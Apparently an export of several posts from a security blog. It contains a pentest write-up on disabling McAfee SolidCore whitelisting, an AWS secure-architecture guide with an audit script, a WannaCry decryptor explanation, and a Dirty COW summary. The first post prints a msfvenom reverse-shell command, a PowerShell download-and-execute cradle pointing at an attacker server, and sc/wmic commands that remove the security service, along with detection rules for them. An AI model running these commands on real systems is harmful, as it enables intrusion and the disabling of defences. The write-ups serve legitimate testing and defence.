AVsecurity (https://www.avsecurity.in)

Bypassing Application Whitelisting Solution SolidCore Part I
https://www.avsecurity.in/bypassing-application-whitelisting-solution-solidcore-part-i/
Sun, 23 Aug 2020 09:01:33 +0000

Bypassing anti-virus has become fairly simple in the malware world today. As a result, companies are beginning to realize that application whitelisting is another tool to consider adding to their critical infrastructure.

Application whitelisting is a computer administration practice used to prevent unauthorized programs from executing. The purpose is primarily to protect computers and networks from malicious applications, and, to a lesser extent, to prevent unauthorized access to the resources.

In this article, we demonstrate how McAfee SolidCore – one of the leaders in this segment – can be bypassed.

Introduction to McAfee SolidCore

“McAfee Application Control blocks unauthorized executables on servers, corporate desktops, and fixed-function devices. Using a dynamic trust model and innovative security features such as local and global reputation intelligence, real-time behavioral analytics, and auto-immunization of endpoints, it immediately thwarts advanced persistent threats—without requiring labor-intensive list management or signature updates.”

In this particular case, the SolidCore security solution was implemented on kiosk infrastructure for restricting unauthorized code on the Windows 7 operating system.

As pentesters, our goal was to disable the SolidCore application in order to run malicious code on the system. Our testing was performed in two phases:

  1. Gaining full code execution (a reverse shell) and disabling the SolidCore service
  2. Bypassing the whitelisting controls to execute basic code on the system while SolidCore was still running

Exploiting Improper Permissions On the SolidCore Service

We logged in as the application user, since this is a kiosk-type machine and the application runs in auto-login mode, i.e. it starts automatically when this application user ID logs in.

Using a Windows shortcut key, we launched Internet Explorer. Pressing “Control + O” let us browse the “C:\Windows\System32” directory, from which we tried to execute cmd.exe.

[Screenshot: running Internet Explorer via Sticky Notes]

However, cmd.exe was blocked by SolidCore. We found that PowerShell, on the other hand, was not restricted.

We created PowerShell shellcode with the “msfvenom” utility by running the following command on our system:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=attackerIP lport=443 -f powershell > test

Using PowerShell, we ran the following commands on the client machine to download and run the shellcode on the target system:

    Get-ExecutionPolicy

    IEX(New-Object System.Net.Webclient).DownloadString("http://attackerserver/test")

    Invoke-Shellcode -shellcode @($buf)

[Screenshot: running PowerSploit in the PowerShell console to receive the reverse TCP connection]

Once the PowerShell payload ran, we received a meterpreter reverse shell on our system. The next step was to obtain SYSTEM access by performing a local privilege escalation attack on the target.

[Screenshot: running the Metasploit handler and receiving the reverse TCP connection]

After obtaining SYSTEM privileges, we migrated the meterpreter process into the SolidCore service process “scsrvc”, then navigated to the SolidCore directory and renamed the SolidCore startup service.

[Screenshot: renaming the service from meterpreter]

After restarting the target system, the SolidCore service was disabled!

[Screenshot: SolidCore service disabled]

Disabling SolidCore Service using the McAfee Service Utility

To fix the first scenario, the client disabled all shortcut keys and PowerShell on the kiosk machine. They also implemented write blocking on the SolidCore directory.

In our next test case, we used the administrative user to check the security of the SolidCore application. Even the Windows Administrator account was not allowed to modify or disable the SolidCore service without providing the SolidCore service credentials.

While performing the assessment, we observed that SolidCore’s own service utility uses cmd.exe to manage the service.

[Screenshot: McAfee service utility]

Using SC Query Utility

After getting command line access, our first step was to create a service called “sysaccount” which would launch the command shell in interactive mode as shown below:

[Screenshot: sc command used to create a service that executes a system command]

We then started the “sysaccount” service:

    sc start Sysaccount

This launched the interactive command line with SYSTEM privileges as shown in the screenshot below:

[Screenshot: interactive cmd shell running as SYSTEM]

Once we had the interactive SYSTEM shell, we executed the command to delete the SolidCore service. Since we were running with SYSTEM privileges, the deletion succeeded.

[Screenshot: sc delete command removing the SolidCore service]

[Screenshot: SolidCore service shown as disabled in SADMIN]

A neat way to use the security product’s own utility against itself!

Using WMIC Utility

To fix this, the client disabled the “sc” command we had used earlier. After some research, we came up with a new technique to disable the SolidCore service using WMI (Windows Management Instrumentation) and the standard Windows taskkill command.

Note: Simple techniques such as using Task Manager do not work, since it is disabled. Killing the service process with taskkill alone does not work either, as the service restarts immediately with a new process ID.

We logged in as administrator, used the same utility as before and executed the commands below. The first calls the uninstall method of the SolidCore product through WMI; the second force-kills the SolidCore service process (scsrvcpid is its process ID):

    wmic product where name="McAfee Solidifier" call uninstall /nointeractive

    taskkill /f /pid scsrvcpid

[Screenshot: WMIC utility uninstalling SolidCore]

And boom – it’s gone again!
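From the defender's side, every step in the three bypasses above leaves a process-creation trace. The following Python rules are an added example (not code from the post or from McAfee) that flag those traces: a kiosk browser spawning a shell, the PowerShell download cradle with Invoke-Shellcode, sc create with a cmd.exe binpath, sc delete of the scsrvc service, wmic product call uninstall of McAfee Solidifier, and a forced taskkill. The event shape (Image, ParentImage, CommandLine) mimics a Sysmon Event ID 1 record and the sample events are constructed.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed detection example, not code from the post or from McAfee.
# Each event mimics a Sysmon Event ID 1 (process creation) record with
# the fields Image, ParentImage and CommandLine.
Event = Dict[str, str]

def _cmdline(ev: Event) -> str:
    return ev.get("CommandLine", "").lower()

def _basename(ev: Event, key: str) -> str:
    # lower-cased file name of Image / ParentImage without its directory
    return ev.get(key, "").lower().rsplit("\\", 1)[-1]

# (rule name, predicate) pairs, one per technique described in the post
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    # Internet Explorer on a kiosk should never spawn a shell
    ("kiosk_browser_spawns_shell", lambda ev:
        _basename(ev, "ParentImage") == "iexplore.exe"
        and _basename(ev, "Image") in ("cmd.exe", "powershell.exe")),
    # IEX(New-Object Net.WebClient).DownloadString(...) download cradle
    ("ps_download_cradle", lambda ev:
        "powershell" in _basename(ev, "Image")
        and re.search(r"downloadstring|downloadfile", _cmdline(ev)) is not None
        and re.search(r"\biex\b|invoke-expression", _cmdline(ev)) is not None),
    # PowerSploit shellcode injection
    ("ps_invoke_shellcode", lambda ev: "invoke-shellcode" in _cmdline(ev)),
    # sc create <name> binpath= "cmd ..." type= interact gives a SYSTEM shell
    ("sc_create_cmd_service", lambda ev:
        _basename(ev, "Image") == "sc.exe"
        and re.search(r"\bcreate\b", _cmdline(ev)) is not None
        and re.search(r'binpath=\s*"?[^"]*\bcmd(\.exe)?\b', _cmdline(ev)) is not None),
    # deleting the SolidCore service (scsrvc)
    ("sc_delete_solidcore", lambda ev:
        _basename(ev, "Image") == "sc.exe"
        and re.search(r'\bdelete\s+"?scsrvc\b', _cmdline(ev)) is not None),
    # wmic product where name="McAfee Solidifier" call uninstall
    ("wmic_uninstall_solidifier", lambda ev:
        _basename(ev, "Image") == "wmic.exe"
        and "call uninstall" in _cmdline(ev)
        and "solidifier" in _cmdline(ev)),
    # forced kill is low severity alone; correlate it with the rules above
    ("taskkill_force", lambda ev:
        _basename(ev, "Image") == "taskkill.exe"
        and "/f" in _cmdline(ev).split()),
]

def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    hits = []
    for idx, ev in enumerate(events):
        for name, pred in RULES:
            if pred(ev):
                hits.append((idx, name))
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"

# Constructed sample events; "attackerserver" is the host name used in the post
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": PS, "CommandLine": "powershell.exe"},
    {"ParentImage": PS, "Image": PS,
     "CommandLine": "powershell -nop -c IEX(New-Object System.Net.WebClient)"
                    ".DownloadString('http://attackerserver/test'); "
                    "Invoke-Shellcode -shellcode @($buf)"},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\sc.exe",
     "CommandLine": 'sc create sysaccount binpath= "cmd /K start" type= own type= interact'},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\sc.exe",
     "CommandLine": "sc start sysaccount"},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\sc.exe",
     "CommandLine": "sc delete scsrvc"},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\wbem\wmic.exe",
     "CommandLine": 'wmic product where name="McAfee Solidifier" call uninstall /nointeractive'},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\taskkill.exe",
     "CommandLine": "taskkill /f /pid 1234"},
    # benign events that must not fire
    {"ParentImage": SYS32 + r"\services.exe", "Image": SYS32 + r"\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\sc.exe",
     "CommandLine": "sc query scsrvc"},
]

def run_sample() -> List[Tuple[int, str]]:
    return detect(SAMPLE_EVENTS)

if __name__ == "__main__":
    for idx, name in run_sample():
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

In a real deployment the sc and wmic rules are worth raising to high severity on hosts where the whitelisting agent is supposed to be unremovable, since legitimate administrators would use the vendor console instead.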

References Used for SolidCore Bypass
https://subt0x10.blogspot.ae/

How to build a highly available, highly scalable AWS secure cloud? – PART II
https://www.avsecurity.in/how-to-build-a-highly-available-highly-scalable-aws-secure-cloud-part-ii/
Wed, 13 Dec 2017 14:00:36 +0000

The scope of this post is to discuss the security features provided by AWS. Having covered the design concepts in the previous post, we now dive deeper and address the security of our cloud architecture.

Securing the Architecture
Security of the cloud environment is important considering the enormous impact it has on core operations. This section addresses security requirements S1 and S2:

  • S1. Securing data at rest and in transit
  • S2. Manage access control as the user base expands

Amazon offers several services that integrate with one another to improve the overall security posture. The following services are significant to our architecture:

VPC (VIRTUAL PRIVATE CLOUD)
Network segmentation is one of the basic controls for restricting access to authorised users. A VPC is a logically isolated section of the AWS cloud in which customers launch AWS resources in a virtual network. A VPC resembles a traditional network: it allows public and private subnets to be created and access to be controlled with security groups.
Furthermore, our architecture stack, i.e. the OpsWorks stack, needs to be launched in a VPC. Once the main VPC is created it is assigned an Internet Gateway. We need to logically isolate the DMZ Tier, Web Tier and Database Tier. In addition, the Web Tier and Database Tier will have a private VPC for each availability zone, connected with VPC peering.

  • DMZ Tier contains ELB, CloudFront, and a public subnet with Bastion host and NAT Gateway.
  • Web Tier is a private subnet managed by OpsWorks App Layer and consists of EC2 instances.
  • Database Tier is a private subnet managed by RDS OpsWorks Layer and consists of AWS Aurora RDS instances.
  • VPC endpoints should be set up to access the private S3 bucket and Glacier vaults from the private VPCs.

SECURITY GROUPS
Security groups are similar to router ACLs: they implement access control on the resources in a particular subnet (VPC). Security groups and VPCs let customers choose private IP ranges and subnet masks as required. We will create three groups: DBGroup for database instances, WebGroup for web server instances and DMZ group for public instances. Briefly, the following controls should be implemented for the VPCs using security groups:

  • The database private subnet (DBGroup) is only accessible from the web server subnet (WebGroup).
  • The web server subnet is only accessible from the elastic load balancer (ELB).
  • The web and database subnets allow outbound connections to the NAT device. This is required for software updates and other maintenance that needs Internet access.
  • The bastion host is only accessible over RDP from the public IP of the customer’s on-premise system.
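The controls above can be checked mechanically against what EC2 DescribeSecurityGroups returns, which is how drift (an engineer opening SSH to the world, or the database to the whole VPC) gets caught. The following Python audit is an added example, not AWS's or the authors' code; it assumes the group names DBGroup, WebGroup, BastionGroup and ELBGroup, the customer range 203.0.113.0/24, and checks ingress only (the NAT egress rule is not modelled). The sample groups are constructed.

```python
from ipaddress import ip_network
from typing import Dict, List, Tuple

# Constructed audit example, not AWS's or the authors' code. The input mirrors
# the shape EC2 DescribeSecurityGroups returns (GroupId, GroupName,
# IpPermissions with IpRanges / UserIdGroupPairs). The group names other than
# DBGroup/WebGroup, the ELBGroup source and the customer CIDR are assumptions.

CUSTOMER_CIDR = "203.0.113.0/24"  # assumed on-premise public range

# Allowed ingress per group as (source, protocol, from_port, to_port);
# source is either "sg:<GroupName>" or a CIDR. Anything not listed here
# is a finding, which encodes the controls from the post.
Allow = Tuple[str, str, int, int]
POLICY: Dict[str, List[Allow]] = {
    "DBGroup": [("sg:WebGroup", "tcp", 3306, 3306)],        # DB only from web tier
    "WebGroup": [("sg:ELBGroup", "tcp", 80, 80),            # web only from the ELB
                 ("sg:ELBGroup", "tcp", 443, 443)],
    "BastionGroup": [(CUSTOMER_CIDR, "tcp", 3389, 3389)],   # RDP only from customer
}

def covered(src: str, proto: str, lo: int, hi: int, allowed: List[Allow]) -> bool:
    """True if an ingress rule (source, protocol, port range) fits one allow entry."""
    for a_src, a_proto, a_lo, a_hi in allowed:
        if proto != a_proto or not (a_lo <= lo and hi <= a_hi):
            continue  # "-1" (all protocols) never fits a specific allow entry
        if src.startswith("sg:") or a_src.startswith("sg:"):
            if src == a_src:
                return True
            continue
        net, a_net = ip_network(src, strict=False), ip_network(a_src, strict=False)
        if net.version == a_net.version and net.subnet_of(a_net):
            return True
    return False

def permission_sources(perm: dict, id_to_name: Dict[str, str]) -> List[str]:
    """Expand one IpPermission into its CIDR and referenced-group sources."""
    srcs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
    srcs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
    srcs += ["sg:" + id_to_name.get(p["GroupId"], p["GroupId"])
             for p in perm.get("UserIdGroupPairs", [])]
    return srcs

def audit(groups: List[dict]) -> List[str]:
    """Return one finding per ingress source that the policy does not permit."""
    id_to_name = {g["GroupId"]: g["GroupName"] for g in groups}
    findings = []
    for g in groups:
        allowed = POLICY.get(g["GroupName"])
        if allowed is None:
            continue  # group outside the policy (e.g. the ELB's own group)
        for perm in g.get("IpPermissions", []):
            proto = perm.get("IpProtocol", "-1")
            lo, hi = perm.get("FromPort", 0), perm.get("ToPort", 65535)
            for src in permission_sources(perm, id_to_name):
                if not covered(src, proto, lo, hi, allowed):
                    findings.append(f"{g['GroupName']}: ingress {proto} {lo}-{hi} "
                                    f"from {src} is not permitted")
    return findings

def _perm(proto, lo, hi, cidrs=(), sgs=()):
    return {"IpProtocol": proto, "FromPort": lo, "ToPort": hi,
            "IpRanges": [{"CidrIp": c} for c in cidrs],
            "UserIdGroupPairs": [{"GroupId": s} for s in sgs]}

# Constructed sample mirroring DescribeSecurityGroups output; each of the
# three policy groups has one compliant rule and one violation.
SAMPLE_GROUPS = [
    {"GroupId": "sg-0db", "GroupName": "DBGroup", "IpPermissions": [
        _perm("tcp", 3306, 3306, sgs=["sg-0web"]),
        _perm("tcp", 3306, 3306, cidrs=["10.0.0.0/16"])]},   # whole VPC, too broad
    {"GroupId": "sg-0web", "GroupName": "WebGroup", "IpPermissions": [
        _perm("tcp", 80, 80, sgs=["sg-0elb"]),
        _perm("tcp", 22, 22, cidrs=["0.0.0.0/0"])]},         # SSH open to the world
    {"GroupId": "sg-0bas", "GroupName": "BastionGroup", "IpPermissions": [
        _perm("tcp", 3389, 3389, cidrs=["203.0.113.10/32"]),
        _perm("tcp", 3389, 3389, cidrs=["0.0.0.0/0"])]},     # RDP open to the world
    {"GroupId": "sg-0elb", "GroupName": "ELBGroup", "IpPermissions": [
        _perm("tcp", 443, 443, cidrs=["0.0.0.0/0"])]},       # not in POLICY, skipped
]

if __name__ == "__main__":
    for line in audit(SAMPLE_GROUPS):
        print(line)
```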

IDENTITY ACCESS MANAGEMENT (IAM)
Amazon IAM enables us to manage user access to AWS resources on a need-to-know basis. IAM supports the creation of users, roles and groups, each with their own permissions. The following basic IAM controls need to be in place to secure the environment:

  • Never log in with the AWS master (root) account. It provides super-user access to all resources in the AWS cloud.
  • Create IAM roles and assign them to instances. RBAC can be implemented using IAM features.
  • Enable two-factor authentication for IAM users.
  • Resource and user policies must be defined to restrict access to the S3 and Glacier repositories.

AWS KEY MANAGEMENT SERVICE (KMS)
KMS is a managed service that handles the encryption keys used to encrypt the data covered by requirement S1. KMS integrates with Amazon CloudTrail to log key usage.

ENCRYPTION

Data at Rest
AWS offers three Key Management Infrastructure (KMI) models for encrypting data at rest. The models differ in how much control AWS and the customer each have over the KMI components. In Model C, AWS manages the entire KMI and offers server-side encryption for all storage services referenced in this guide. Model C server-side encryption is recommended for the current architecture to avoid key management overhead for the customer. It uses AES-256 for server-side encryption, and all storage services in our architecture support this feature.

Data in transit
AWS services support IPsec and SSL/TLS for encrypting data in transit. IPsec lets applications communicate securely without any modification, whereas SSL/TLS often requires application-layer support. Moreover, HTTPS traffic can be offloaded at the ELB to minimise the performance impact on the web servers; however, security and performance requirements need to be evaluated based on data criticality.

LOGGING AND MONITORING
Logging and monitoring user activity is one of the core principles of information security. The CloudTrail web service tracks API calls on the AWS account and stores the log files in an S3 bucket. It integrates seamlessly with AWS OpsWorks and supports compliance with standards and policies.

SECURITY PATCHING
The infrastructure security of EC2 instances, including patching and hardening, must be managed by the customer. Security and maintenance of services like ELB and RDS are managed by Amazon.

Conclusion
We have identified all the concepts and components required to build an AWS architecture that meets the customer requirements. The final reference architecture shown below brings these concepts and components together. The architecture is self-explanatory; however, do let us know in the comment section if you have any queries.

[Figure: final reference architecture]

How to build a highly available, highly scalable AWS secure cloud? – PART I
https://www.avsecurity.in/how-to-build-a-highly-available-highly-scalable-aws-secure-cloud-part-i/
Wed, 13 Dec 2017 13:54:14 +0000

Introduction

This architecture introduces best practices for building a highly available, scalable, manageable and secure web application on the Amazon Web Services (AWS) cloud. It specifically addresses the requirements and concerns described in the requirements section below. This guide will be valuable to any individual or team that understands basic networking concepts. It is a two-part series: Part 1 (this post) discusses the general requirements and AWS-specific concepts, defines the terminology used in the series, and builds a foundation by discussing general design concepts; Part 2 addresses the security aspects of the architecture and several ways to leverage the available AWS services, then consolidates all the information and sketches the final architecture. So, let’s get started.

Methodology

This guide is split into two main sections that answer the following questions and propose a reference architecture:

  • How can a highly available, scalable and manageable web application be built on the AWS Cloud?
  • How can a web application environment be secured in the AWS Cloud?

It will cover high-level concepts; technical and configuration details are out of scope. The focus will be on the core production environment, restricted to the components that address the customer requirements. The reference architecture rests on the following assumptions:

  • The architecture mirrors a traditional web hosting infrastructure.
  • The architecture does not consider cost estimation for the project.
  • It focuses on DevOps automation to allow easy management and replication of multiple environments.
  • The default purchasing option for all AWS services is “On-Demand”, due to the uncertainty of the workload.
  • The AWS Aurora web service is available in the region of the architecture.

Requirements

Customer requirements can be logically grouped into 6 major criteria. The unique IDs assigned below are referenced throughout the document:

High-availability (HA)

  • HA1. provision for Disaster Recovery
  • HA2. effective distribution of load
  • HA3. a self-healing infrastructure that recovers from failed service instances

High-scalability (HS)

  • HS1. Infrastructure scaling to meet the demand (load-based scaling)
  • HS2. On-demand services due to uncertainty of workload

Low-latency (LL)

  • LL1. Reduce latency of web application

Archival strategy (AS)

  • AS1. An archival strategy needed for objects inactive for more than 6 months

Convenience and control (CC)

  • CC1. Capability to configure database and data access layer
  • CC2. Capability to effortlessly manage and replicate multiple environments based on blueprint architecture.

Security (S)

  • S1. Securing data at rest and in transit
  • S2. Manage access control as the user base expands

Architecture Design
This section addresses the high availability, high scalability, low-latency and management requirements. The present environment is based on a LAMP stack (PHP and MySQL), which must be implemented using a multi-tier architecture as per best practices. The basic three-tier architecture consists of a Client Tier, Web Tier and Database Tier. Our architecture, however, will conceptually have a DMZ Tier, Web Tier, Database Tier and Ancillary Tier.
The AWS OpsWorks service offers the control and convenience needed to implement the LAMP stack as a multi-tier architecture. It is a configuration management service that offers Chef recipes (blueprints) and infrastructure orchestration, and also introduces “point and click” deployment alternatives. OpsWorks features map to the customer requirements as follows:

  • HS1 – auto instance scaling feature that automatically adds instances based on defined criteria (load or time based) and implemented using Auto-scaling groups.
  • HA2 – ELB service layer effectively distributes the load by performing the health check on underlying EC2 instances.
  • CC2 – OpsWorks management console introduces replication of complete stack in distinct availability zones or regions without any hassle.
  • CC1 – RDS service layer that provides the necessary level of abstraction and control on underlying RDS instances.
  • HA3 – auto-healing feature ensures that if any instance fails in the stack it is automatically replaced with a new instance.

Core architecture components will be implemented as follows:

  • Web Server – Amazon EC2 instance implemented with PHP App Server AWS OpsWorks Layer blueprint.
  • MySQL Database server – MySQL database engine on RDS instance.

AWS CONCEPTS
The following AWS concepts are key to understanding the architecture:
Auto scaling (High scalability)
Auto Scaling allows the instance or service to automatically scale the capacity according to defined conditions. AWS services scale dynamically and without impacting the availability of service. Auto Scaling ensures that instances scale out flawlessly to meet the demand.

Multi-AZ (High availability)
Each AWS data centre location is called a region, which contains several distinct locations called Availability Zones, or AZs. AZs are engineered to be isolated from each other in case of failure, and afford low-latency, low-cost network connectivity to the other AZs in the same region. The high availability requirements of the application can be met by launching all services in multiple availability zones (Multi-AZ).

APPLICATION LAYERS
All application layers will be implemented within Virtual Private Clouds (VPCs) and OpsWorks Layers unless explicitly stated otherwise. The AWS services referenced in this architecture support server-side encryption and SSL/TLS, hence the security requirements are consolidated in the “Encryption” section.

DMZ Tier
The DMZ consists of the Elastic Load Balancer and a public subnet containing the NAT gateway and a Bastion Host. The Load Balancer will be implemented using the OpsWorks stack, but the NAT gateway and Bastion instances will be placed in a public subnet communicating directly with the Internet Gateway.

Bastion Host
A bastion host is required to reduce the attack surface of AWS cloud and allow secure management of resources. It will be a hardened, public facing, internet exposed, special purpose EC2 instance launched in Multi-AZ deployment.

NAT Gateway
NAT gateway is a managed service that allows outbound connections from private subnets to the Internet but prevents the Internet from initiating connections to these subnets. NAT Gateway will be implemented in Multi-AZ deployment.

Elastic Load Balancing (ELB)
AWS Elastic Load Balancing (ELB) improves fault tolerance and availability by placing compute instances behind a Load Balancer. ELB health checks increase availability and reduce the latency of application. ELB features can be mapped to customer requirements as follows:

  • HS1 – ELB automatically scales its request handling capacity in response to incoming application traffic.
  • HA1 – ELB can automatically balance traffic across multiple instances and multiple Availability Zones.
  • HA2 – ELB detects unhealthy EC2 instances and spreads the load across the remaining healthy instances.

Web Tier
Web Tier consists of PHP/Apache application server implemented using Amazon EC2 instances and PHP App Server AWS OpsWorks Layer. EC2 combined with OpsWorks layer can be mapped to following customer requirements:

  • HA – Application layer is supported by one or more EC2 instances in Multi-AZ deployment.
  • HS – Auto-scaling groups scale-out EC2 instances based on defined criteria (load based threshold).
  • CC2 – The PHP App Server OpsWorks Layer automatically handles instance scaling and offers blueprints to launch PHP application server instances in the OpsWorks stack.

Database Tier
The Database Tier is responsible for persistent data management and runs on the standard MySQL database engine. Although Amazon RDS is an appropriate choice, it does not offer an auto-scaling feature for compute configuration. Amazon Aurora is a database cluster service built on top of RDS instances that offers high availability, auto-scalability and self-healing capability. Aurora’s features address the following customer requirements:

  • HA1 and HA3- Aurora storage is self-healing and fault-tolerant. It also offers automatic backups and point in time restore for disaster recovery.
  • HS1 – Aurora scales storage automatically. Although compute scaling is not automatic, cluster replicas can handle the load seamlessly during the upgrade process.
  • LL1 – Query cache is enabled by default in Aurora, reducing latency.
  • CC1 and CC2 – Aurora leverages the RDS capabilities for managing administrative tasks like automatic backups, software patching and maintenance of the underlying infrastructure.

Ancillary Tier
Amazon services stated below optimise latency and address archival, backup, and disaster recovery requirements.

Simple Storage Service (S3)
S3 is a highly available storage service that stores data as objects. We need two S3 buckets for our architecture: a public bucket holding the static files (HTML, images, video, etc.) used by the CloudFront configuration, and a private bucket storing automatic backups and persistent EC2 data.

CloudFront
CloudFront is Amazon’s content delivery network. It works with S3 buckets to rapidly deliver web content across the globe and optimise the latency of an application. It supports private content, HTTPS authentication and parametrised requests. CloudFront depends on an S3 bucket for the original data objects and refers back to the origin server (S3 bucket) for updated information.

Glacier
Glacier is a data archival service that integrates with S3, IAM, and CloudTrail. It will be configured to automate data archiving on S3 buckets based on defined criteria. Data stored in Glacier is immutable, encrypted and mandates request signing. A low-cost archival strategy for objects older than 6 months can be achieved by combining Lifecycle management feature of S3 with Glacier.

Combinations of S3, CloudFront and Glacier address following customer requirements:

  • HA – S3 automatically replicates data within the region and also offers cross-region replication.
  • HS – S3 supports auto-scaling based on demand.
  • LL1 – CloudFront and S3 reduce latency and improve the performance of the application.
  • AS1 – Glacier provides low-cost archival service in conjunction with S3 lifecycle management feature. S3 allows the customer to define the rules of archival and specify the objects that need to be archived.

We will take a logical break here and cover cloud security in the next part, before drafting the final architecture.

Decryptor for Wanacry Ransomware
https://www.avsecurity.in/a-decryptor-for-wanacry/
Sat, 22 Apr 2017 16:00:10 +0000

WannaCry

WannaCry is ransomware that exploits “ETERNALBLUE”, a vulnerability found in the NSA exploits released by the ShadowBrokers.
The WannaCry ransomware attack was a worldwide cyberattack by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency.

wanakiwi is based on wanadecrypt and makes it possible for lucky users to:

  • recover the private user key from memory and save it as 00000000.dky
  • decrypt all of their files

The prime extraction method is based on Adrien Guinet’s wannakey (https://github.com/aguinet/wannakey), which scans the WannaCry process memory to recover the prime numbers that were not wiped during CryptReleaseContext().
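The recovery idea above can be walked through end to end on a small key. The following Python is an added illustration, not wanakiwi's or wannakey's code: it generates an RSA key, plants one prime in a constructed memory dump, scans the dump for a window whose value divides the public modulus, and rebuilds the private exponent from the recovered prime. The 512-bit key size, the little-endian layout, the dump size and the offset are assumptions made for the example.

```python
import random
from typing import Optional, Tuple

# Constructed illustration of the wannakey/wanakiwi idea, not their code:
# if one prime factor of the RSA public modulus is still in the memory of
# the process that generated the key, the private key can be rebuilt from
# it. Key size (512 bits), dump layout and offset are constructed; real
# WannaCry keys are 2048-bit RSA.
SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits: int) -> int:
    """Random odd prime with exactly `bits` bits (top bit set)."""
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def modinv(a: int, m: int) -> int:
    """Modular inverse of a mod m (extended Euclid)."""
    r0, r1, s0, s1 = m, a % m, 0, 1
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    if r0 != 1:
        raise ValueError("no inverse")
    return s0 % m

def make_rsa(bits: int = 512) -> Tuple[int, int, int, int, int]:
    """Return (n, e, d, p, q) for a fresh RSA key of `bits` bits."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:
            return p * q, e, modinv(e, phi), p, q

def scan_dump_for_factor(dump: bytes, n: int, prime_bytes: int) -> Optional[Tuple[int, int]]:
    """Slide a prime_bytes-wide window over the dump. A window whose
    little-endian value divides n is a prime factor of n (CryptoAPI key
    bl

obs store primes little-endian; assumed layout). Returns (offset, prime) or None."""
    for off in range(len(dump) - prime_bytes + 1):
        cand = int.from_bytes(dump[off:off + prime_bytes], "little")
        if cand > 1 and cand & 1 and n % cand == 0:
            return off, cand
    return None

def rebuild_private_key(n: int, e: int, p: int) -> Tuple[int, int]:
    """Given one prime factor p of n, recover (d, q)."""
    q = n // p
    if p * q != n:
        raise ValueError("p does not divide n")
    return modinv(e, (p - 1) * (q - 1)), q

def build_fake_dump(p: int, prime_bytes: int, size: int = 4096, offset: int = 1234) -> bytes:
    """Constructed 'process memory': random bytes with p embedded at offset."""
    rnd = random.Random(7)
    buf = bytearray(rnd.getrandbits(8) for _ in range(size))
    buf[offset:offset + prime_bytes] = p.to_bytes(prime_bytes, "little")
    return bytes(buf)

def demo(bits: int = 512) -> dict:
    """Generate a key, 'leak' p into a fake dump, recover and verify the key."""
    n, e, d, p, q = make_rsa(bits)
    prime_bytes = bits // 16  # each prime is bits/2 bits, i.e. bits/16 bytes
    found = scan_dump_for_factor(build_fake_dump(p, prime_bytes), n, prime_bytes)
    d2, q2 = rebuild_private_key(n, e, found[1])
    m = int.from_bytes(b"WNCRY test", "big")  # constructed plaintext, < n
    return {"offset": found[0], "prime_ok": found[1] == p,
            "key_ok": d2 == d and q2 == q,
            "roundtrip": pow(pow(m, e, n), d2, n) == m}

if __name__ == "__main__":
    print(demo())
```

The divisibility check alone identifies the prime, which is why the real tool needs only the public key (00000000.pky) and a still-live process: once the process memory is gone, there is nothing left to scan.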

Usage

    wanakiwi.exe [PID]

PID is an optional parameter; by default the utility looks for any of these processes:

  • wnry.exe
  • wcry.exe
  • data_1.exe
  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Limitations

Given that this method relies on scanning the address space of the process that generated the keys, if that process has been killed, for instance by a reboot, the original process memory is lost. It is very important that users do NOT reboot their system before trying this tool.
Secondly, for the same reason, we do not know how long the prime numbers will be kept in the address space before being reused by the process. This is why it is important to try this utility as soon as possible.

This is not a perfect tool, but this has been so far the best solution for victims who had no backup.

Compatibility (32-bit only)

Windows XP
Windows 2003
Windows 7

Does it modify the original encrypted files?

No, the original encrypted files (.WNCRY) remain unmodified. The decrypted files are generated as separate files.

Dirty COW Vulnerability (CVE-2016-5195)
https://www.avsecurity.in/dirty-cow-vulnerability-cve-2016-5195/
Tue, 25 Oct 2016 12:36:58 +0000

A security researcher recently uncovered a critical vulnerability present in the Linux kernel since version 2.6.22 (released in 2007), affecting both the Linux and Android platforms. In short, this vulnerability allows attackers to gain root access to servers and take control of the whole system.

This week the security researcher made the issue public. The vulnerability has been present in the Linux kernel for nine years, but gained attention only recently when hackers started exploiting it.

[Image: Dirty COW Linux kernel exploit]

How it works?

The security hole was detected by researcher Phil Oester, who found a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. Attackers can use this to gain write access to otherwise read-only mappings and in this way take control of whole systems.

What versions of the Operating System are affected?

  • Red Hat Enterprise Linux 7.x, 6.x and 5.x
  • CentOS Linux 7.x, 6.x and 5.x
